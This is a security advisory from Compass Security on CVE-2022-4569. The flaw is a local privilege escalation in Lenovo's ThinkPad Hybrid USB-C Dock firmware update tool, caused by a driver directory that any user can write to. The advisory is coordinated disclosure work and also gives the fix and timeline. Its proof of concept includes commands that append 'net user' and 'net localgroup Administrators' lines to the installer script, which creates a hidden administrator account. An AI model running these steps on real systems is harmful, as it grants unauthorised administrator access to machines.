############################################################# # # COMPASS SECURITY ADVISORY # https://www.compass-security.com/research/advisories/ # ############################################################# # # Product: ThinkPad Hybrid USB-C with USB-A Dock Firmware Update Tool # Vendor: Lenovo # URL: https://support.lenovo.com/us/en/product_security/LEN-103544 # CSNC ID: CSNC-2022-16 # CVE ID: CVE-2022-4569 # Subject: Local Privilege Escalation # Risk: High # Effect: Locally exploitable # Author: info@compass-security.com # Date: 14.10.2022 # ############################################################# Introduction ------------ ThinkPad Hybrid USB-C with USB-A Dock is a docking station for ThinkPad laptops. The docking station comes with an optional driver, which is installable from the Lenovo System Update application.[1] Compass Security identified a local privilege escalation vulnerability, allowing regular users on a system with ThinkPad Hybrid USB-C with USB-A Dock Driver installed or installable via Lenovo System Update to escalate their privileges to local administrator. Affected -------- Vulnerable: * ThinkPad Hybrid USB-C with USB-A Dock Firmware Update Tool prior to V1.0.35_v2 Tested versions: * ThinkPad Hybrid USB-C with USB-A Dock Firmware Update Tool V1.0.33 * ThinkPad Hybrid USB-C with USB-A Dock Firmware Update Tool V1.0.34 * ThinkPad Hybrid USB-C with USB-A Dock Firmware Update Tool V1.0.35 Not vulnerable: * ThinkPad Hybrid USB-C with USB-A Dock Firmware V1.0.35_v2 Tested on: * Windows 10 21H2 (OS Build 19044.2075) * Windows 10 21H2 (OS Build 19044.2130) Technical Description --------------------- The Lenovo System Update installs the ThinkPad Hybrid USB-C with USB-A Dock Firmware Update Tool under the following directory: `C:\DRIVERS\ThinkPad_Hybrid_USB-C_With_USB-A_Dock_MFG_Driver_V1.0.0.15` Under a default windows installation, the Authenticated Users group has modify permissions for the full directory. Therefore, regular users may modify any file within the directory. During the update process via Lenovo System Update, a temporary administrative user `lenovo_tmp_` with a random name suffix is created. When the driver in question is installed, the following command is run from a temporary process created by the administrative user: `cmd.exe /C "c:\DRIVERS\ThinkPad_Hybrid_USB-C_With_USB-A_Dock_MFG_Driver_ V1.0.0.15\DriverInstallerScript.bat" /silent` Proof of Concept ---------------- The exploitation of the vulnerability consists of the following steps: 1. Modify the directory of the driver. For example, `DriverInstallerScript.bat` may be modified or dll files may be paced to be loaded by the driver. Alternatively, an executable may be replaced or a DLL may be placed to be loaded from the directory in question by an existing Lenovo executable. 2. Run the Lenovo System Update. The following example PowerShell script for example adds a user: ``` echo "net user /add InsertedUser Password.123!!!" >> "C:\DRIVERS\ThinkPad_ Hybrid_USB-C_With_USB-A_Dock_MFG_Driver_V1.0.0.15\DriverInstallerScript.bat" echo "net localgroup Administrators InsertedUser /add" >> "C:\DRIVERS\ThinkPad_ Hybrid_USB-C_With_USB-A_Dock_MFG_Driver_V1.0.0.15\DriverInstallerScript.bat" PS C:\Program Files (x86)\Lenovo\System Update> .\ConfigService.exe start PS C:\Program Files (x86)\Lenovo\System Update> .\TvsuCommandLauncher.exe 5 ``` Workaround / Fix ---------------- Either ensure the ACLs of the directory is set as restrictive as possible upon creation of the directory or move the directory into a location, where regular users inherently do not have access. Timeline -------- 2022-10-10: Discovery by Compass Security 2022-10-14: Initial vendor notification 2022-10-17: Initial vendor response 2023-05-09: Release of fixed Version / Patch 2023-05-09: Coordinated public disclosure date References ---------- [1] https://support.lenovo.com/us/en/solutions/pd500180-thinkpad-hybrid-usb-c-with-usb-a-dock-overview-and-service-parts